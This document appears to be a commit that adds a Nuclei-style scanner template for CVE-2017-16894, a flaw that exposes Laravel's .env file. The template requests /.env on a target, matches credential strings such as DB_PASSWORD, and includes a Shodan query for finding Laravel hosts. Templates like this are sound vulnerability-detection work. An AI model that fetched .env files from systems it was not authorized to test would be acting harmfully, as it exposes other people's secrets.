Create CVE-2017-16894.yaml

2023-04-13 13:38:32 +08:00 · 2023-04-13 13:38:32 +08:00 · 86a48dc6ae
parent 5ffdd65882
commit 86a48dc6ae
1 changed files with 43 additions and 0 deletions
--- a/cves/2017/CVE-2017-16894.yaml
+++ b/cves/2017/CVE-2017-16894.yaml
@ -0,0 +1,43 @@
+id: CVE-2017-16894
+
+info:
+  name: Laravel framework < 5.5.21 Info Leak
+  author: j4vaovo
+  severity: high
+  description: |
+    In Laravel framework through 5.5.21, remote attackers can obtain sensitive information (such as externally usable passwords) via a direct request for the /.env URI. NOTE: this CVE is only about Laravel framework's writeNewEnvironmentFileWith function in src/Illuminate/Foundation/Console/KeyGenerateCommand.php, which uses file_put_contents without restricting the .env permissions. The .env filename is not used exclusively by Laravel framework.
+  reference:
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16894
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2017-16894
+    cwe-id: CWE-200
+  metadata:
+    verified: "true"
+    shodan-query: app="Laravel-Framework"
+  tags: cve,cve2017,laravel
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/.env"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "APP_NAME="
+          - "APP_DEBUG="
+          - "DB_PASSWORD="
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - "application/octet-stream"
+
+      - type: status
+        status:
+          - 200